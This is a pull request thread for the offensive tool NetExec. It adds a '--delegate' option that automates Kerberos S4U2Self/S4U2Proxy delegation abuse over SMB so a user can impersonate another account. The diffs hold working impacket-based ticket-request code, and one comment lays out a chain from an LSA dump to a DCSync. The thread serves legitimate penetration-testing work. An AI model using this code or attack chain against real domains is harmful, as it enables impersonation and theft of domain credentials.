### PR TITLE
Implement s4u abuse

### PR DESCRIPTION
**Pull request by zblurx**
Added `--delegate` option to implement s4u abuse over smb
image
This option will do a full S4U abuse (S4U2Self + S4U2Proxy) in an automated way, allowing to use all postex functionalities of NXC :fire:

### CODE REVIEW

**Comment by bongobongoland** [comment]
omg.

**Comment by Marshall-Hallenbeck** [comment]
@zblurx can you add this to the e2e tests command file as well?

**Comment by XiaoliChan** [comment]
I test it, it works (with protocol transition)
image

**Comment by zblurx** [comment]
As @XiaoliChan suggested to me, we should also support s4u2self only:
image

**Comment by XiaoliChan** [comment]
Really awesome!
image

image

File: nxc/protocols/smb/kerberos.py [hunk 1]
```diff
@@ -0,0 +1,381 @@
...
+    if useCache:
+        domain, user, tgt, _ = CCache.parseFile(domain, user, 'cifs/%s' % hostname)
+        if TGT is None:
+            raise
+        TGT = tgt['KDC_REP']
+        cipher = tgt['cipher']
+        sessionKey = tgt['sessionKey']
+    if TGT is None:
+        userName = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+        logging.info('Getting TGT for user')
```
Comment (NeffIsBack) [inline nxc/protocols/smb/kerberos.py:30]: That should probably be logged through the nxc logger

File: nxc/protocols/smb/kerberos.py [hunk 2]
```diff
@@ -0,0 +1,381 @@
...
+    seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+    now = datetime.datetime.utcnow()
+    authenticator['cusec'] = now.microsecond
+    authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+    if logging.getLogger().level == logging.DEBUG:
+        logging.debug('AUTHENTICATOR')
+        print(authenticator.prettyPrint())
+        print('\n')
```
Comment (NeffIsBack) [inline nxc/protocols/smb/kerberos.py:65]: Same for this, or is there a reason we would need another logger?

File: nxc/protocols/smb/kerberos.py [hunk 3]
```diff
@@ -0,0 +1,381 @@
...
+        #                 + ('' if (encTicketPart['flags'][TicketFlags.forwardable.value] == 1) else ' not')
+        #                 + ' forwardable')
+
+        # # Re-encode and re-encrypt the ticket
+        # # Again, Key Usage 2
+        # encodedEncTicketPart = encoder.encode(encTicketPart)
+        # cipherText = newCipher.encrypt(key, 2, encodedEncTicketPart, None)
+
+        # # put it back in the TGS
+        # tgs['ticket']['enc-part']['cipher'] = cipherText
```
Comment (NeffIsBack) [inline nxc/protocols/smb/kerberos.py:261]: Is this for future use? Or old code that could be removed?

If this is for future implementation I think we could add a comment at the top clarifying it.

File: nxc/protocols/smb/kerberos.py [hunk 4]
```diff
@@ -0,0 +1,381 @@
...
+    reqBody['till'] = KerberosTime.to_asn1(now)
+    reqBody['nonce'] = random.getrandbits(31)
+    seq_set_iter(reqBody, 'etype',
+                    (
+                        int(constants.EncryptionTypes.rc4_hmac.value),
+                        int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
+                        int(constants.EncryptionTypes.des_cbc_md5.value),
+                        int(cipher.enctype)
+                    )
+                    )
```
Comment (NeffIsBack) [inline nxc/protocols/smb/kerberos.py:354]: The indentation is one tab to much

File: nxc/protocols/smb/proto_args.py [hunk 5]
```diff
@@ -2,6 +2,8 @@ def proto_args(parser, std_parser, module_parser):
         smb_parser = parser.add_parser("smb", help="own stuff using SMB", parents=[std_parser, module_parser])
         smb_parser.add_argument("-H", "--hash", metavar="HASH", dest="hash", nargs="+", default=[],
                                 help="NTLM hash(es) or file(s) containing NTLM hashes")
+        smb_parser.add_argument("--delegate", action="store", help="Impersonate user with S4U2Self + S4U2Proxy")
+        smb_parser.add_argument("--self", dest='no_s4u2proxy', action="store_true", help="Only do S4U2Self, no S4U2Proxy (use with delegate)")
```
Comment (NeffIsBack) [inline nxc/protocols/smb/proto_args.py:6]: I think for using this, `--delegation` should be required. See ldap protoargs, "no_smb_arg"

**Review by NeffIsBack — CHANGES_REQUESTED** [review]
Can you also replace the single quotes with double quotes?

Left some comments, the rest of the code looks good👍🏼

**Review by Marshall-Hallenbeck — CHANGES_REQUESTED** [review]

File: nxc/protocols/smb/kerberos.py (hunk 2 above)
Comment (zblurx) [reply nxc/protocols/smb/kerberos.py]: resolved

File: nxc/protocols/smb/kerberos.py (hunk 3 above)
Comment (zblurx) [reply nxc/protocols/smb/kerberos.py]: removed

File: nxc/protocols/smb/proto_args.py (hunk 5 above)
Comment (zblurx) [reply nxc/protocols/smb/proto_args.py]: good idea

File: nxc/protocols/smb/kerberos.py [hunk 6]
```diff
@@ -72,96 +67,80 @@ def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash
...
-    tgsReq['padata'][0]['padata-value'] = encodedApReq
+    tgsReq["padata"] = noValue
+    tgsReq["padata"][0] = noValue
+    tgsReq["padata"][0]["padata-type"] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+    tgsReq["padata"][0]["padata-value"] = encodedApReq
 
     # In the S4U2self KRB_TGS_REQ/KRB_TGS_REP protocol extension, a service
     # requests a service ticket to itself on behalf of a user. The user is
-    # identified to the KDC by the user's name and realm.
+    # identified to the KDC by the user"s name and realm.
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:88]: Not necessary for merge, but it looks like the replace all replaced on that shouldn't be lol.

In the future the Ruff linter will properly fix these (with --fix) or let people know.

File: nxc/protocols/smb/kerberos.py [hunk 7]
```diff
@@ -170,127 +149,49 @@ def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash
...
-        # cipherText = newCipher.encrypt(key, 2, encodedEncTicketPart, None)
-
-        # # put it back in the TGS
-        # tgs['ticket']['enc-part']['cipher'] = cipherText
-
     ################################################################################
     # Up until here was all the S4USelf stuff. Now let's start with S4U2Proxy
     # So here I have a ST for me.. I now want a ST for another service
     # Extract the ticket from the TGT
     ticketTGT = Ticket()
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:168]: Pythonic name should be `ticket_tgt`

File: nxc/protocols/smb/kerberos.py [hunk 8]
```diff
@@ -170,127 +149,49 @@ def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash
...
+    apReq["ap-options"] = constants.encodeFlags(opts)
+    seq_set(apReq, "ticket", ticketTGT.to_asn1)
 
     authenticator = Authenticator()
-    authenticator['authenticator-vno'] = 5
-    authenticator['crealm'] = str(decodedTGT['crealm'])
+    authenticator["authenticator-vno"] = 5
+    authenticator["crealm"] = str(decodedTGT["crealm"])
 
     clientName = Principal()
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:187]: Pythonic name should be `client_name`

File: nxc/protocols/smb/kerberos.py [hunk 9]
```diff
@@ -170,127 +149,49 @@ def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash
...
     ticketTGT = Ticket()
-    ticketTGT.from_asn1(decodedTGT['ticket'])
+    ticketTGT.from_asn1(decodedTGT["ticket"])
 
     # Get the service ticket
     ticket = Ticket()
-    ticket.from_asn1(tgs['ticket'])
+    ticket.from_asn1(tgs["ticket"])
 
     apReq = AP_REQ()
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:175]: Pythonic name should be `ap_req`

File: nxc/protocols/smb/kerberos.py [hunk 10]
```diff
@@ -300,66 +201,66 @@ def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash
     # key (Section 5.5.1)
     encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:202]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 11]
```diff
@@ -170,127 +149,49 @@ def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash
...
-    seq_set(authenticator, 'cname', clientName.components_to_asn1)
+    seq_set(authenticator, "cname", clientName.components_to_asn1)
 
     now = datetime.datetime.utcnow()
-    authenticator['cusec'] = now.microsecond
-    authenticator['ctime'] = KerberosTime.to_asn1(now)
+    authenticator["cusec"] = now.microsecond
+    authenticator["ctime"] = KerberosTime.to_asn1(now)
 
     encodedAuthenticator = encoder.encode(authenticator)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:196]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 12]
```diff
@@ -300,66 +201,66 @@ def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash
...
     encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
 
-    apReq['authenticator'] = noValue
-    apReq['authenticator']['etype'] = cipher.enctype
-    apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+    apReq["authenticator"] = noValue
+    apReq["authenticator"]["etype"] = cipher.enctype
+    apReq["authenticator"]["cipher"] = encryptedEncodedAuthenticator
 
     encodedApReq = encoder.encode(apReq)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:208]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 13]
```diff
@@ -300,66 +201,66 @@ def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash
...
 
     tgsReq = TGS_REQ()
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:210]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 14]
```diff
@@ -300,66 +201,66 @@ def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash
...
-    tgsReq['padata'][0]['padata-value'] = encodedApReq
+    tgsReq["pvno"] = 5
+    tgsReq["msg-type"] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+    tgsReq["padata"] = noValue
+    tgsReq["padata"][0] = noValue
+    tgsReq["padata"][0]["padata-type"] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+    tgsReq["padata"][0]["padata-value"] = encodedApReq
 
     # Add resource-based constrained delegation support
     paPacOptions = PA_PAC_OPTIONS()
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:220]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 15]
```diff
@@ -300,66 +201,66 @@ def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash
...
 
-    tgsReq['padata'][1] = noValue
-    tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
-    tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
+    tgsReq["padata"][1] = noValue
+    tgsReq["padata"][1]["padata-type"] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
+    tgsReq["padata"][1]["padata-value"] = encoder.encode(paPacOptions)
 
-    reqBody = seq_set(tgsReq, 'req-body')
+    reqBody = seq_set(tgsReq, "req-body")
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:227]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 16]
```diff
@@ -300,66 +201,66 @@ def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash
...
 
-    reqBody['kdc-options'] = constants.encodeFlags(opts)
+    reqBody["kdc-options"] = constants.encodeFlags(opts)
     service2 = Principal(spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
-    seq_set(reqBody, 'sname', service2.components_to_asn1)
-    reqBody['realm'] = domain
+    seq_set(reqBody, "sname", service2.components_to_asn1)
+    reqBody["realm"] = domain
 
     myTicket = ticket.to_asn1(TicketAsn1())
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:241]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 17]
```diff
@@ -0,0 +1,282 @@
...
+
+from impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \
+    Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS
+from impacket.krb5.types import Principal, KerberosTime, Ticket
+from impacket.krb5.kerberosv5 import sendReceive, getKerberosTGT
+from impacket.krb5.ccache import CCache
+from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5
+from impacket.krb5 import constants
+
+def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash, aesKey, kdcHost, impersonate, spn, useCache, no_s4u2proxy = False):
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:18]: useCache needs snakecase

File: nxc/protocols/smb/kerberos.py [hunk 18]
```diff
@@ -0,0 +1,282 @@
...
+    logger = logging.getLogger("nxc")
+    TGT = None
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:20]: Should just be "tgt"

File: nxc/protocols/smb/kerberos.py [hunk 19]
```diff
@@ -0,0 +1,282 @@
...
+from impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \
+    Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS
+from impacket.krb5.types import Principal, KerberosTime, Ticket
+from impacket.krb5.kerberosv5 import sendReceive, getKerberosTGT
+from impacket.krb5.ccache import CCache
+from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5
+from impacket.krb5 import constants
+
+def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash, aesKey, kdcHost, impersonate, spn, useCache, no_s4u2proxy = False):
+    logger = logging.getLogger("nxc")
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:19]: Shouldn't have to do this, you can just do `from nxc.logger import nxc_logger` and then use that.

File: nxc/protocols/smb/kerberos.py [hunk 20]
```diff
@@ -0,0 +1,282 @@
...
+
+    tgsReq["padata"] = noValue
+    tgsReq["padata"][0] = noValue
+    tgsReq["padata"][0]["padata-type"] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+    tgsReq["padata"][0]["padata-value"] = encodedApReq
+
+    # In the S4U2self KRB_TGS_REQ/KRB_TGS_REP protocol extension, a service
+    # requests a service ticket to itself on behalf of a user. The user is
+    # identified to the KDC by the user"s name and realm.
+    clientName = Principal(impersonate, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:89]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 21]
```diff
@@ -0,0 +1,282 @@
...
+
+    S4UByteArray = struct.pack("<I", constants.PrincipalNameType.NT_PRINCIPAL.value)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:91]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 22]
```diff
@@ -0,0 +1,282 @@
...
+    S4UByteArray += b(impersonate) + b(domain) + b"Kerberos"
+
+    # Finally cksum is computed by calling the KERB_CHECKSUM_HMAC_MD5 hash
+    # with the following three parameters: the session key of the TGT of
+    # the service performing the S4U2Self request, the message type value
+    # of 17, and the byte array S4UByteArray.
+    checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:98]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 23]
```diff
@@ -0,0 +1,282 @@
...
+
+    paForUserEnc = PA_FOR_USER_ENC()
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:100]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 24]
```diff
@@ -0,0 +1,282 @@
...
+    seq_set(paForUserEnc, "userName", clientName.components_to_asn1)
+    paForUserEnc["userRealm"] = domain
+    paForUserEnc["cksum"] = noValue
+    paForUserEnc["cksum"]["cksumtype"] = int(constants.ChecksumTypes.hmac_md5.value)
+    paForUserEnc["cksum"]["checksum"] = checkSum
+    paForUserEnc["auth-package"] = "Kerberos"
+
+    encodedPaForUserEnc = encoder.encode(paForUserEnc)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:108]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 25]
```diff
@@ -0,0 +1,282 @@
...
+
+    tgsReq["padata"][1] = noValue
+    tgsReq["padata"][1]["padata-type"] = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
+    tgsReq["padata"][1]["padata-value"] = encodedPaForUserEnc
+
+    reqBody = seq_set(tgsReq, "req-body")
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:114]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 26]
```diff
@@ -0,0 +1,282 @@
...
+
+    opts = list()
+    opts.append(constants.KDCOptions.forwardable.value)
+    opts.append(constants.KDCOptions.renewable.value)
+    opts.append(constants.KDCOptions.canonicalize.value)
+
+    reqBody["kdc-options"] = constants.encodeFlags(opts)
+
+    serverName = Principal(username, type=constants.PrincipalNameType.NT_UNKNOWN.value)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:123]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 27]
```diff
@@ -0,0 +1,282 @@
...
+                    )
+                )
+    message = encoder.encode(tgsReq)
+
+    logger.info("Requesting S4U2Proxy")
+    r = sendReceive(message, domain, kdcHost)
+
+    tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+    cipherText = tgs["enc-part"]["cipher"]
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:263]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 28]
```diff
@@ -0,0 +1,282 @@
...
+
+    # Key Usage 8
+    # TGS-REP encrypted part (includes application session
+    # key), encrypted with the TGS session key (Section 5.4.2)
+    plainText = cipher.decrypt(sessionKey, 8, cipherText)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:268]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 29]
```diff
@@ -0,0 +1,282 @@
...
+
+    encTGSRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:270]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 30]
```diff
@@ -0,0 +1,282 @@
...
+
+    newSessionKey = Key(encTGSRepPart["key"]["keytype"], encTGSRepPart["key"]["keyvalue"].asOctets())
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:272]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 31]
```diff
@@ -0,0 +1,282 @@
...
+        cipherText = tgs["enc-part"]["cipher"]
+
+        # Key Usage 8
+        # TGS-REP encrypted part (includes application session
+        # key), encrypted with the TGS session key (Section 5.4.2)
+        plainText = cipher.decrypt(sessionKey, 8, cipherText)
+
+        encTGSRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]
+
+        newSessionKey = Key(encTGSRepPart["key"]["keytype"], encTGSRepPart["key"]["keyvalue"].asOctets())
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:152]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 32]
```diff
@@ -0,0 +1,282 @@
...
+
+    if no_s4u2proxy:
+        cipherText = tgs["enc-part"]["cipher"]
+
+        # Key Usage 8
+        # TGS-REP encrypted part (includes application session
+        # key), encrypted with the TGS session key (Section 5.4.2)
+        plainText = cipher.decrypt(sessionKey, 8, cipherText)
+
+        encTGSRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:150]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 33]
```diff
@@ -0,0 +1,282 @@
...
+
+    tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+    if no_s4u2proxy:
+        cipherText = tgs["enc-part"]["cipher"]
+
+        # Key Usage 8
+        # TGS-REP encrypted part (includes application session
+        # key), encrypted with the TGS session key (Section 5.4.2)
+        plainText = cipher.decrypt(sessionKey, 8, cipherText)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:148]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 34]
```diff
@@ -0,0 +1,282 @@
...
+
+    logger.info("Requesting S4U2self")
+    message = encoder.encode(tgsReq)
+
+    r = sendReceive(message, domain, kdcHost)
+
+    tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+    if no_s4u2proxy:
+        cipherText = tgs["enc-part"]["cipher"]
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:143]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 35]
```diff
@@ -0,0 +1,282 @@
...
+    clientName = Principal()
+    clientName.from_asn1(decodedTGT, "crealm", "cname")
+
+    seq_set(authenticator, "cname", clientName.components_to_asn1)
+
+    now = datetime.datetime.utcnow()
+    authenticator["cusec"] = now.microsecond
+    authenticator["ctime"] = KerberosTime.to_asn1(now)
+
+    encodedAuthenticator = encoder.encode(authenticator)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:62]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 36]
```diff
@@ -0,0 +1,282 @@
...
+    # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
+    # TGS authenticator subkey), encrypted with the TGS session
+    # key (Section 5.5.1)
+    encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
+
+    apReq["authenticator"] = noValue
+    apReq["authenticator"]["etype"] = cipher.enctype
+    apReq["authenticator"]["cipher"] = encryptedEncodedAuthenticator
+
+    encodedApReq = encoder.encode(apReq)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:74]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 37]
```diff
@@ -0,0 +1,282 @@
...
+    authenticator["cusec"] = now.microsecond
+    authenticator["ctime"] = KerberosTime.to_asn1(now)
+
+    encodedAuthenticator = encoder.encode(authenticator)
+
+    # Key Usage 7
+    # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
+    # TGS authenticator subkey), encrypted with the TGS session
+    # key (Section 5.5.1)
+    encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:68]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 38]
```diff
@@ -0,0 +1,282 @@
...
+
+    apReq["authenticator"] = noValue
+    apReq["authenticator"]["etype"] = cipher.enctype
+    apReq["authenticator"]["cipher"] = encryptedEncodedAuthenticator
+
+    encodedApReq = encoder.encode(apReq)
+
+    tgsReq = TGS_REQ()
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:76]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 39]
```diff
@@ -0,0 +1,282 @@
...
+                                                                lmhash, nthash,
+                                                                aesKey,
+                                                                kdcHost)
+        TGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+    decodedTGT=TGT
+    # Extract the ticket from the TGT
+    ticket = Ticket()
+    ticket.from_asn1(decodedTGT["ticket"])
+
+    apReq = AP_REQ()
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:41]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 40]
```diff
@@ -0,0 +1,282 @@
...
+        sessionKey = tgt["sessionKey"]
+    if TGT is None:
+        userName = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+        logger.debug("Getting TGT for user")
+        tgt, cipher, _, sessionKey = getKerberosTGT(userName, password, domain,
+                                                                lmhash, nthash,
+                                                                aesKey,
+                                                                kdcHost)
+        TGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+    decodedTGT=TGT
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:36]: Needs snake case

File: nxc/protocols/smb/kerberos.py [hunk 41]
```diff
@@ -0,0 +1,282 @@
...
+        cipher = tgt["cipher"]
+        sessionKey = tgt["sessionKey"]
+    if TGT is None:
+        userName = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+        logger.debug("Getting TGT for user")
+        tgt, cipher, _, sessionKey = getKerberosTGT(userName, password, domain,
+                                                                lmhash, nthash,
+                                                                aesKey,
+                                                                kdcHost)
+        TGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:35]: should be snake case, but "tgt" is taken above. Maybe rename the one above and set this to "tgt"

File: nxc/protocols/smb/kerberos.py [hunk 42]
```diff
@@ -0,0 +1,282 @@
...
+from impacket.krb5 import constants
+
+def kerberos_login_with_S4U(domain, hostname, username, password, nthash, lmhash, aesKey, kdcHost, impersonate, spn, useCache, no_s4u2proxy = False):
+    logger = logging.getLogger("nxc")
+    TGT = None
+    if useCache:
+        domain, user, tgt, _ = CCache.parseFile(domain, username, f"cifs/{hostname}")
+        if TGT is None:
+            raise
+        TGT = tgt["KDC_REP"]
```
Comment (Marshall-Hallenbeck) [inline nxc/protocols/smb/kerberos.py:25]: Needs snake case

**Review by Marshall-Hallenbeck — CHANGES_REQUESTED** [review]
Mostly a bunch of variable naming to conform to proper Pythonic naming, but also pointed out importing the nxc logger.

**Comment by zblurx** [comment]
All good now I think

**Comment by NeffIsBack** [comment]
There are still a few single quotes but we should probably wait until #35 is merged, a lot of it is fixed in there

**Comment by Marshall-Hallenbeck** [comment]
@zblurx #35 got merged in, if you can take care of the few conflicts here it should be good to merge.

**Comment by NeffIsBack** [comment]
There must be an `hasattribute` check on the delegation arg. Otherwise we get that error on other protocols:
image

**Comment by NeffIsBack** [comment]
image
Working like a charm, except `--ntds`. @zblurx is this fixable?
image

**Comment by zblurx** [comment]
So for the `--ntds`, the problem is with impacket secretsdump. Actually secretsdump needs a cifs ticket AND an ldap ticket, but the `--delegate` will only get a cifs ticket. So my workaround is :
- 1: You use `--delegate` to do a `--lsa` and get the nthash of the DC computer account
- 2: You use the DC computer account to do a dcsync with `--ntds`

**Comment by NeffIsBack** [comment]
Working flawlessly
image

**Review by NeffIsBack — APPROVED** [review]
LGTM 🎉

**Review by mpgn — APPROVED** [review]

**Review by Marshall-Hallenbeck — APPROVED** [review]
LGTM

**Pull request merged**